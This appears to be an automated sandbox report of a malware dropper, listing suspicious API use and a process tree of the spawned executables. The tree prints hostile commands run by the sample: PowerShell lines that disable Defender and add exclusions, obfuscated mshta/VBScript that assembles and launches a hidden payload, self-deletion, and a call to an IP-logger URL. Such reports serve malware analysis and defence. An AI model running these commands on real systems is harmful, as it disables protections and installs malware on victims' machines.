04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Tue0971aafeebb6f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Tue09786995c7f02a923.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1164 SmartClock.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 824 Tue09792fda06e.exe 824 Tue09792fda06e.exe 1320 powershell.exe 1796 powershell.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1584 Tue09c257807a702a4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe 1348 Tue09264824c4.exe -
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
pid Process 1364 Process not Found 1640 WerFault.exe 1072 WerFault.exe 2772 iexplore.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 824 Tue09792fda06e.exe 2804 hfbrctu 2736 hfbrctu -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 1944 Tue0971aafeebb6f.exe Token: SeAssignPrimaryTokenPrivilege 1944 Tue0971aafeebb6f.exe Token: SeLockMemoryPrivilege 1944 Tue0971aafeebb6f.exe Token: SeIncreaseQuotaPrivilege 1944 Tue0971aafeebb6f.exe Token: SeMachineAccountPrivilege 1944 Tue0971aafeebb6f.exe Token: SeTcbPrivilege 1944 Tue0971aafeebb6f.exe Token: SeSecurityPrivilege 1944 Tue0971aafeebb6f.exe Token: SeTakeOwnershipPrivilege 1944 Tue0971aafeebb6f.exe Token: SeLoadDriverPrivilege 1944 Tue0971aafeebb6f.exe Token: SeSystemProfilePrivilege 1944 Tue0971aafeebb6f.exe Token: SeSystemtimePrivilege 1944 Tue0971aafeebb6f.exe Token: SeProfSingleProcessPrivilege 1944 Tue0971aafeebb6f.exe Token: SeIncBasePriorityPrivilege 1944 Tue0971aafeebb6f.exe Token: SeCreatePagefilePrivilege 1944 Tue0971aafeebb6f.exe Token: SeCreatePermanentPrivilege 1944 Tue0971aafeebb6f.exe Token: SeBackupPrivilege 1944 Tue0971aafeebb6f.exe Token: SeRestorePrivilege 1944 Tue0971aafeebb6f.exe Token: SeShutdownPrivilege 1944 Tue0971aafeebb6f.exe Token: SeDebugPrivilege 1944 Tue0971aafeebb6f.exe Token: SeAuditPrivilege 1944 Tue0971aafeebb6f.exe Token: SeSystemEnvironmentPrivilege 1944 Tue0971aafeebb6f.exe Token: SeChangeNotifyPrivilege 1944 Tue0971aafeebb6f.exe Token: SeRemoteShutdownPrivilege 1944 Tue0971aafeebb6f.exe Token: SeUndockPrivilege 1944 Tue0971aafeebb6f.exe Token: SeSyncAgentPrivilege 1944 Tue0971aafeebb6f.exe Token: SeEnableDelegationPrivilege 1944 Tue0971aafeebb6f.exe Token: SeManageVolumePrivilege 1944 Tue0971aafeebb6f.exe Token: SeImpersonatePrivilege 1944 Tue0971aafeebb6f.exe Token: SeCreateGlobalPrivilege 1944 Tue0971aafeebb6f.exe Token: 31 1944 Tue0971aafeebb6f.exe Token: 32 1944 Tue0971aafeebb6f.exe Token: 33 1944 Tue0971aafeebb6f.exe Token: 34 1944 Tue0971aafeebb6f.exe Token: 35 1944 Tue0971aafeebb6f.exe Token: SeDebugPrivilege 1320 powershell.exe Token: SeDebugPrivilege 1796 powershell.exe Token: SeDebugPrivilege 320 Tue0978af55b9.exe Token: SeDebugPrivilege 1264 Tue0985edbf92e08954.exe Token: SeShutdownPrivilege 1364 Process not Found Token: SeShutdownPrivilege 1364 Process not Found Token: SeDebugPrivilege 2452 taskkill.exe Token: SeShutdownPrivilege 1364 Process not Found Token: SeShutdownPrivilege 1364 Process not Found Token: SeShutdownPrivilege 1364 Process not Found Token: SeShutdownPrivilege 1364 Process not Found Token: SeDebugPrivilege 304 taskkill.exe Token: SeDebugPrivilege 1640 WerFault.exe Token: SeDebugPrivilege 1072 WerFault.exe Token: SeShutdownPrivilege 1364 Process not Found Token: SeShutdownPrivilege 1364 Process not Found Token: SeShutdownPrivilege 1364 Process not Found Token: SeShutdownPrivilege 1364 Process not Found Token: SeShutdownPrivilege 1364 Process not Found Token: SeShutdownPrivilege 1364 Process not Found Token: SeShutdownPrivilege 1364 Process not Found Token: SeDebugPrivilege 2540 Tue09c6db969ab9.exe Token: SeShutdownPrivilege 1364 Process not Found Token: SeDebugPrivilege 2372 taskkill.exe Token: SeShutdownPrivilege 1364 Process not Found Token: SeShutdownPrivilege 1364 Process not Found Token: SeShutdownPrivilege 1364 Process not Found Token: SeShutdownPrivilege 1364 Process not Found Token: SeDebugPrivilege 2532 Tue09c1731fe55c7.exe Token: SeDebugPrivilege 1684 Tue091e2054cef7.exe -
Suspicious use of FindShellTrayWindow 22 IoCs
pid Process 2036 Tue0947ef38552fc.exe 2036 Tue0947ef38552fc.exe 2036 Tue0947ef38552fc.exe 2036 Tue0947ef38552fc.exe 2036 Tue0947ef38552fc.exe 2036 Tue0947ef38552fc.exe 2036 Tue0947ef38552fc.exe 2280 Tue0990c8b597f.tmp 2036 Tue0947ef38552fc.exe 1364 Process not Found 1364 Process not Found 2360 run2.exe 1364 Process not Found 1364 Process not Found 2360 run2.exe 2036 Tue0947ef38552fc.exe 1364 Process not Found 1364 Process not Found 2360 run2.exe 1364 Process not Found 1364 Process not Found 2772 iexplore.exe -
Suspicious use of SendNotifyMessage 17 IoCs
pid Process 2036 Tue0947ef38552fc.exe 2036 Tue0947ef38552fc.exe 2036 Tue0947ef38552fc.exe 2036 Tue0947ef38552fc.exe 2036 Tue0947ef38552fc.exe 2036 Tue0947ef38552fc.exe 2036 Tue0947ef38552fc.exe 1364 Process not Found 1364 Process not Found 2360 run2.exe 2360 run2.exe 2036 Tue0947ef38552fc.exe 2360 run2.exe 1364 Process not Found 1364 Process not Found 1364 Process not Found 1364 Process not Found -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2772 iexplore.exe 2772 iexplore.exe 2368 IEXPLORE.EXE 2368 IEXPLORE.EXE 2368 IEXPLORE.EXE 2368 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1560 wrote to memory of 1676 1560 setup_x86_x64_install.exe 28 PID 1560 wrote to memory of 1676 1560 setup_x86_x64_install.exe 28 PID 1560 wrote to memory of 1676 1560 setup_x86_x64_install.exe 28 PID 1560 wrote to memory of 1676 1560 setup_x86_x64_install.exe 28 PID 1560 wrote to memory of 1676 1560 setup_x86_x64_install.exe 28 PID 1560 wrote to memory of 1676 1560 setup_x86_x64_install.exe 28 PID 1560 wrote to memory of 1676 1560 setup_x86_x64_install.exe 28 PID 1676 wrote to memory of 1160 1676 setup_installer.exe 29 PID 1676 wrote to memory of 1160 1676 setup_installer.exe 29 PID 1676 wrote to memory of 1160 1676 setup_installer.exe 29 PID 1676 wrote to memory of 1160 1676 setup_installer.exe 29 PID 1676 wrote to memory of 1160 1676 setup_installer.exe 29 PID 1676 wrote to memory of 1160 1676 setup_installer.exe 29 PID 1676 wrote to memory of 1160 1676 setup_installer.exe 29 PID 1160 wrote to memory of 536 1160 setup_install.exe 31 PID 1160 wrote to memory of 536 1160 setup_install.exe 31 PID 1160 wrote to memory of 536 1160 setup_install.exe 31 PID 1160 wrote to memory of 536 1160 setup_install.exe 31 PID 1160 wrote to memory of 536 1160 setup_install.exe 31 PID 1160 wrote to memory of 536 1160 setup_install.exe 31 PID 1160 wrote to memory of 536 1160 setup_install.exe 31 PID 1160 wrote to memory of 1456 1160 setup_install.exe 32 PID 1160 wrote to memory of 1456 1160 setup_install.exe 32 PID 1160 wrote to memory of 1456 1160 setup_install.exe 32 PID 1160 wrote to memory of 1456 1160 setup_install.exe 32 PID 1160 wrote to memory of 1456 1160 setup_install.exe 32 PID 1160 wrote to memory of 1456 1160 setup_install.exe 32 PID 1160 wrote to memory of 1456 1160 setup_install.exe 32 PID 1160 wrote to memory of 560 1160 setup_install.exe 33 PID 1160 wrote to memory of 560 1160 setup_install.exe 33 PID 1160 wrote to memory of 560 1160 setup_install.exe 33 PID 1160 wrote to memory of 560 1160 setup_install.exe 33 PID 1160 wrote to memory of 560 1160 setup_install.exe 33 PID 1160 wrote to memory of 560 1160 setup_install.exe 33 PID 1160 wrote to memory of 560 1160 setup_install.exe 33 PID 1160 wrote to memory of 1580 1160 setup_install.exe 34 PID 1160 wrote to memory of 1580 1160 setup_install.exe 34 PID 1160 wrote to memory of 1580 1160 setup_install.exe 34 PID 1160 wrote to memory of 1580 1160 setup_install.exe 34 PID 1160 wrote to memory of 1580 1160 setup_install.exe 34 PID 1160 wrote to memory of 1580 1160 setup_install.exe 34 PID 1160 wrote to memory of 1580 1160 setup_install.exe 34 PID 1160 wrote to memory of 2028 1160 setup_install.exe 35 PID 1160 wrote to memory of 2028 1160 setup_install.exe 35 PID 1160 wrote to memory of 2028 1160 setup_install.exe 35 PID 1160 wrote to memory of 2028 1160 setup_install.exe 35 PID 1160 wrote to memory of 2028 1160 setup_install.exe 35 PID 1160 wrote to memory of 2028 1160 setup_install.exe 35 PID 1160 wrote to memory of 2028 1160 setup_install.exe 35 PID 1160 wrote to memory of 972 1160 setup_install.exe 36 PID 1160 wrote to memory of 972 1160 setup_install.exe 36 PID 1160 wrote to memory of 972 1160 setup_install.exe 36 PID 1160 wrote to memory of 972 1160 setup_install.exe 36 PID 1160 wrote to memory of 972 1160 setup_install.exe 36 PID 1160 wrote to memory of 972 1160 setup_install.exe 36 PID 1160 wrote to memory of 972 1160 setup_install.exe 36 PID 1160 wrote to memory of 1784 1160 setup_install.exe 37 PID 1160 wrote to memory of 1784 1160 setup_install.exe 37 PID 1160 wrote to memory of 1784 1160 setup_install.exe 37 PID 1160 wrote to memory of 1784 1160 setup_install.exe 37 PID 1160 wrote to memory of 1784 1160 setup_install.exe 37 PID 1160 wrote to memory of 1784 1160 setup_install.exe 37 PID 1160 wrote to memory of 1784 1160 setup_install.exe 37 PID 1160 wrote to memory of 1992 1160 setup_install.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵PID:536
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1320
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1456
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0985edbf92e08954.exe4⤵
- Loads dropped DLL
PID:560 -
C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue0985edbf92e08954.exeTue0985edbf92e08954.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1264
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c257807a702a4.exe4⤵
- Loads dropped DLL
PID:1580 -
C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue09c257807a702a4.exeTue09c257807a702a4.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1584 -
C:\Users\Admin\Pictures\Adobe Films\TiwxVUX_NRmfqyHfx8zmVK7w.exe"C:\Users\Admin\Pictures\Adobe Films\TiwxVUX_NRmfqyHfx8zmVK7w.exe"6⤵
- Executes dropped EXE
PID:3052
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 7006⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue097328c1b990.exe4⤵
- Loads dropped DLL
PID:2028 -
C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue097328c1b990.exeTue097328c1b990.exe5⤵
- Executes dropped EXE
PID:1244
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0978af55b9.exe4⤵
- Loads dropped DLL
PID:972 -
C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue0978af55b9.exeTue0978af55b9.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:320
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c6db969ab9.exe4⤵
- Loads dropped DLL
PID:1784 -
C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue09c6db969ab9.exeTue09c6db969ab9.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1748 -
C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue09c6db969ab9.exeC:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue09c6db969ab9.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2540
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09a30919dc5f00.exe4⤵
- Loads dropped DLL
PID:1992 -
C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue09a30919dc5f00.exeTue09a30919dc5f00.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:396 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscrIPT: CLosE( creatEobjeCt("WSCRIpt.Shell" ).RUN( "C:\Windows\system32\cmd.exe /R TYPe ""C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue09a30919dc5f00.exe"" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If """" == """" for %b In (""C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue09a30919dc5f00.exe"" ) do taskkill /f /iM ""%~Nxb"" " , 0 , TRUe ) )6⤵PID:2068
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue09a30919dc5f00.exe" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 &If "" == "" for %b In ("C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue09a30919dc5f00.exe" ) do taskkill /f /iM "%~Nxb"7⤵PID:2948
-
C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u868⤵
- Executes dropped EXE
PID:2332 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscrIPT: CLosE( creatEobjeCt("WSCRIpt.Shell" ).RUN( "C:\Windows\system32\cmd.exe /R TYPe ""C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe"" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If ""-PhwqM9LteEkjDz5gZPyhw9N49u86 "" == """" for %b In (""C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe"" ) do taskkill /f /iM ""%~Nxb"" " , 0 , TRUe ) )9⤵PID:2496
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 &If "-PhwqM9LteEkjDz5gZPyhw9N49u86 " == "" for %b In ("C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe" ) do taskkill /f /iM "%~Nxb"10⤵PID:1652
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBscrIpT:cloSE (cREateObJEct( "wsCRipt.SheLl" ).rUn( "Cmd.exe /q /R ecHo | sEt /P = ""MZ"" > ~dWBNpV.F & Copy /b /y ~dWbNpV.F +YsLNPQ.k + 9Jd86KPL.RS + 6VTZU.XA8+CQ3X0._+ 3hAXC.X ..\2GBhNGG.N &sTaRt msiexec.exe /y ..\2GbhNGG.n & DEl /Q * " ,0, TRue))9⤵PID:2320
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /R ecHo | sEt /P = "MZ" > ~dWBNpV.F &Copy /b /y ~dWbNpV.F +YsLNPQ.k + 9Jd86KPL.RS + 6VTZU.XA8+CQ3X0._+ 3hAXC.X ..\2GBhNGG.N &sTaRt msiexec.exe /y ..\2GbhNGG.n & DEl /Q *10⤵PID:2720
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHo "11⤵PID:2064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>~dWBNpV.F"11⤵PID:2432
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /y ..\2GbhNGG.n11⤵PID:2004
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /iM "Tue09a30919dc5f00.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2452
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c1731fe55c7.exe4⤵
- Loads dropped DLL
PID:1652 -
C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue09c1731fe55c7.exeTue09c1731fe55c7.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1280 -
C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue09c1731fe55c7.exeC:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue09c1731fe55c7.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09786995c7f02a923.exe4⤵
- Loads dropped DLL
PID:1272 -
C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue09786995c7f02a923.exeTue09786995c7f02a923.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1808 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1541270557.exe"6⤵PID:2920
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\8432794453.exe"6⤵PID:1448
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Tue09786995c7f02a923.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue09786995c7f02a923.exe" & exit6⤵PID:2780
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Tue09786995c7f02a923.exe" /f7⤵
- Kills process with taskkill
PID:108
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0947ef38552fc.exe4⤵
- Loads dropped DLL
PID:992 -
C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue0947ef38552fc.exeTue0947ef38552fc.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2036 -
C:\Users\Public\run.exeC:\Users\Public\run.exe6⤵
- Executes dropped EXE
PID:2212 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵PID:2732
-
-
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2360 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/18tji77⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2772 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2772 CREDAT:275457 /prefetch:28⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2368
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09792fda06e.exe4⤵
- Loads dropped DLL
PID:1392 -
C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue09792fda06e.exeTue09792fda06e.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:824
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue091e2054cef7.exe4⤵
- Loads dropped DLL
PID:1720 -
C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue091e2054cef7.exeTue091e2054cef7.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1684 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Dzpafigaxd.vbs"6⤵PID:2940
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google\Qekdqa.exe'7⤵PID:2848
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dzpafigaxd.vbs"6⤵PID:2584
-
C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"7⤵
- Executes dropped EXE
PID:2544
-
-
-
C:\Users\Admin\AppData\Local\Temp\MSBuild.exeC:\Users\Admin\AppData\Local\Temp\MSBuild.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2768 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com7⤵PID:976
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\miovivhtw.vbs"7⤵PID:968
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\8⤵PID:2500
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09264824c4.exe4⤵
- Loads dropped DLL
PID:1736 -
C:\Users\Admin\AppData\Local\Temp\7zSC860DF46\Tue09264824c4.exeTue09264824c4.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1348 -
C:\Users\Admin\Pictures\Adobe Films\TiwxVUX_NRmfqyHfx8zmVK7w.exe"C:\Users\Admin\Pictures\Adobe Films\TiwxVUX_NRmfqyHfx8zmVK7w.exe"6⤵
- Executes dropped EXE
PID:3044
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 14046⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
-
-
